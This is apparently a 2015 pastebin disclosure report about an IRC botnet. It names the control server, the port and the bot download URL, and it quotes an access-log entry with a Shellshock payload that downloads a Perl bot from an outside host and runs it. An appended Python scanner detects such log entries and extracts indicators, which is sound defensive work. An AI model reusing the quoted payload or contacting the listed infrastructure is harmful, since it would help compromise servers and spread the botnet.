irc botnet disclosure 16/JAN/2015 - part 3

a guest Jan 16th, 2015 535 Never
http://pastebin.com/SPMkyZ4w - saga continues.. (:
 _____________________________________
[```` BOTNET INVESTIGATION REPORT ````]
 `````````````````````````````````````

Date: January 16, 2015
Botnet type: IRC Bots/Malware
Botnet control server IP: 64.32.12.57   (Sharktech.net)
Protocol: IRC
Port: 80   ( /connect 64.32.12.57 80    -j #new )
Hacked hosts: >500
Previous reports of the same botnet: http://pastebin.com/DabxDiwm , http://pastebin.com/SPMkyZ4w
Bot url: http://74.208.166.12/bot.txt  (mirror: http://pastebin.com/Zbkke58A)
            (u17173405.onlinehome-server.com Numerical: 74.208.166.12)

Access log:
217.114.212.26 - - [16/Jan/2015:15:46:35 -0500] "GET /phppath/cgi_wrapper HTTP/1.0" 404 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESSX\x22;system(\x22wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\x22);'"


We can clearly see that this is a Shellshock exploitation attempt: the User-Agent header carries a bash function definition followed by a command that downloads and runs a Perl script. The source code of that script is here:
 http://74.208.166.12/bot.txt  ( MIRROR:  http://pastebin.com/Zbkke58A )

From the source code we can clearly see that this is an IRC bot that connects to the following server:
$servidor='64.32.12.57' unless $servidor;
my $porta='80';
my @canais=("#new");
my @adms=("X","Y");
my @auth=("*!*@evil");

Hey, whoever you are, it's the third time I'm reporting you to the public, maybe you'll stop attacking my server? I see you are enjoying everyone using your botnet :-) Good luck.
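
Added example, not part of the original report: a small log scanner that flags requests like the one in the access log above by looking for the bash function-definition marker in the request, referer and user-agent fields, and pulls out the download URL as an indicator. It assumes the common "combined" log layout and the \xNN escaping seen in that entry; the function names and the second sample line are constructed for illustration.

```python
import re

# Common "combined" access-log layout: ip, time, request, status, size, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)
# Shellshock marker: a value that starts a bash function definition, "() {".
MARKER_RE = re.compile(r'\(\)\s*\{')
# URLs the injected command tries to fetch (second-stage download locations).
URL_RE = re.compile(r'https?://[^\s;\'"\\]+')

# First line is the access-log entry from the report above; second is a constructed benign entry.
SAMPLE_LOG = r'''
217.114.212.26 - - [16/Jan/2015:15:46:35 -0500] "GET /phppath/cgi_wrapper HTTP/1.0" 404 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESSX\x22;system(\x22wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\x22);'"
198.51.100.7 - - [16/Jan/2015:15:47:02 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
'''

def unescape(field):
    """Decode the \\xNN escapes the web server writes for quotes and backslashes."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), field)

def scan_line(line):
    """Return a finding dict for a Shellshock attempt, or None for other lines."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    decoded = {f: unescape(m.group(f)) for f in ("request", "referer", "agent")}
    hit_fields = sorted(f for f, v in decoded.items() if MARKER_RE.search(v))
    if not hit_fields:
        return None
    urls = sorted({u for f in hit_fields for u in URL_RE.findall(decoded[f])})
    return {"ip": m.group("ip"), "time": m.group("ts"), "request": m.group("request"),
            "status": int(m.group("status")), "fields": hit_fields, "urls": urls}

def scan_log(text):
    """Scan every line of a log and collect the findings."""
    return [f for f in map(scan_line, text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The status field helps triage: a 404, as on the entry from the report, means the requested CGI path did not exist on that server. The extracted URL and source IP are still worth recording as indicators.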